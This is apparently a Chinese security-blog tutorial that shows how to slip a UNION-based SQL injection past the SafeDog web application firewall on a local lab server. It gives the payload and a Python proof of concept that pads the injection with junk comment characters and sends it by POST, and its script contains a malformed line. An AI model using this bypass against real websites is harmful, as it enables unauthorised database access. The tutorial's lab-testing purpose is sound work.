0x01 实验环境准备
1.安全狗一只
2.phpstudy一枚
3.python3及requests库一枚
4.burp一枚
0x02 php代码
```
```
首先连接localhost数据库账号root密码root
之后创建一个test数据库users表
0x03 实战开始
id不需要闭合为了省事 直接查用户
http://192.168.0.106/zr.php?id=1union select user(),2 发现直接拦截
掏出我的大保健,当安全狗遇到超大数据包,会处理不过来直接扔给后端去处理。从而可以绕过。get方式的话肯定是不可行的,直接换成post。
下面是我用python写的一个简单的poc (通过叠加无用字符进行绕过)
payload:1/无用的字符/ union select user(),2
```
import requests
url = "http://192.168.0.106/zr.php"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"
}
try:
for i in range(1,5000):
st = "/"+"ABC"i+"*/ union select user(),2"
data={
"id":"1 %s " %st
}
print(i)
res= requests.post(url,headers=headers,data=data).text
print(data)
print(res)
except:
print('终止执行')
```
之后将这些内容放到burp里面,转为post方式并提交
成功绕过!!!
Keberos之SPN及其利用 关于SPN 服务主体名称(SPN:ServicePrincipal Names)是服务实例(可以理解为一个服务,比如 HTTP、MSSQL)的唯一标识符。 如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论